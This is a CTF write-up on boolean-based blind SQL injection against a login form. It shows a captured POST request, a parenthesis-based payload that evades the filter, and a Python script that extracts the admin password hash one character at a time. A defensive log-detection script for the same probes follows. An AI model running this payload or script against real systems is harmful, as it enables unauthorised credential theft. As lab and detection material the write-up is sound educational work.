[CTF] Boolean-based blind SQL injection
阿新 • Published: 2020-12-26
1. The challenge
Hint: boolean-based blind SQL injection
Description: SQL injection
Opening the challenge shows yet another web login page; from the hint we can guess that this is a SQL injection via POST.
2. Solution steps
1. Capture the request with Burp
POST /index.php HTTP/1.1
Host: 114.67.246.176:10965
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://114.67.246.176:10965/
Cookie: PHPSESSID=j4u9u18ei1r7serqv1vhg9km34
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

username=admin&password=123

# With username=admin the page answers "password error",
# so the username is admin.
# When injecting into username, < > = are all filtered, but or is not.
# I used username=a'or(1) and or(0)%23 to confirm the injection.
# Deliberately sending a wrong username gives a response whose text tells the truth value apart.
Construct the payload
username=admi'or((ascii(substr((select(password))from(1)))-48))%23&password=123
2. Python script
import time

import requests
from requests.adapters import HTTPAdapter

url = "http://pandarking.ctf:10965/index.php"
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE',
    'Connection': 'close',  # disable keep-alive
}

with requests.Session() as s:
    database = "passwd:"
    s.mount("http://", HTTPAdapter(max_retries=5))  # retry failed connections
    for i in range(1, 32):          # character position in the password
        for j in range(48, 128):    # candidate ASCII code
            # ascii(char_i) - j is 0 (false) only when char_i == j, and then
            # the OR-ed username check fails with "username does not exist"
            sql = 'admi\'or((ascii(substr((select(password))from({0})))-{1}))--\''.format(i, j)
            data = {'username': sql, 'password': "123"}
            try:
                res = s.post(url, data=data, timeout=5, headers=headers)
            except requests.RequestException:
                time.sleep(2)
                res = s.post(url, data=data, timeout=5, headers=headers)
            if 'username does not exist' in res.text:
                database += chr(j)
                print(database)
                break
            res.close()

# Result: passwd:4dcc88f8f1bc05e7c2ad1a60288481a
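From the defender's side, the enumeration above leaves a very recognisable trail: one request per (position, candidate byte) pair, all carrying the same ascii(substr(...)from(N))-M expression. The following detector is an added example, not part of the write-up; it reads constructed request log lines (hypothetical IPs, an assumed "ip method path body status" format and a deliberately low threshold) and flags clients issuing repeated probes of exactly that shape.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Shape of the probe used in the write-up (parenthesised to dodge the filter):
#   admi'or((ascii(substr((select(password))from(N)))-M))--'
# The OR-ed term is non-zero (true) unless byte N of the password equals M,
# so the enumeration sends one request per (N, M) pair.
PROBE_RE = re.compile(r"ascii\(\s*substr\(.+?from\s*\(?(\d+)\)?\s*\)+\s*-\s*(\d+)", re.I)

def parse_probe(username):
    """Return (position, candidate byte) if the field carries a probe, else None."""
    m = PROBE_RE.search(username)
    return (int(m.group(1)), int(m.group(2))) if m else None

def analyse(log_lines, threshold=3):
    """Count distinct probes per client IP; report clients at or above threshold.
    Assumed log format: "<ip> <method> <path> <urlencoded body> <status>". A real
    enumeration needs hundreds of requests; the threshold is low for the sample."""
    probes = defaultdict(set)
    for line in log_lines:
        ip, _method, _path, body, _status = line.split()
        username = parse_qs(body).get("username", [""])[0]
        hit = parse_probe(username)
        if hit:
            probes[ip].add(hit)
    return {
        ip: {"probes": len(hits), "positions": sorted({pos for pos, _ in hits})}
        for ip, hits in probes.items()
        if len(hits) >= threshold
    }

# Constructed sample log lines (hypothetical IPs), not traffic from the challenge.
_P = ("admi%27or%28%28ascii%28substr%28%28select%28password%29%29"
      "from%28{n}%29%29%29-{m}%29%29--%27")
SAMPLE_LOG = [
    "10.0.0.9 POST /index.php username=admin&password=hunter2 200",
    "10.0.0.5 POST /index.php username=" + _P.format(n=1, m=48) + "&password=123 200",
    "10.0.0.5 POST /index.php username=" + _P.format(n=1, m=52) + "&password=123 200",
    "10.0.0.5 POST /index.php username=" + _P.format(n=2, m=99) + "&password=123 200",
    "10.0.0.5 POST /index.php username=" + _P.format(n=2, m=100) + "&password=123 200",
    "10.0.0.9 POST /index.php username=bob&password=letmein 200",
]

if __name__ == "__main__":
    for ip, info in analyse(SAMPLE_LOG).items():
        print(f"{ip}: {info['probes']} blind-injection probes over positions {info['positions']}")
```

Because the regex keys on the tokens rather than the literal string, it also catches variants that change the target column or the padding parentheses; the positions list shows how far the enumeration has progressed.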
3. Log in to the back end to get the flag
Thanks for reading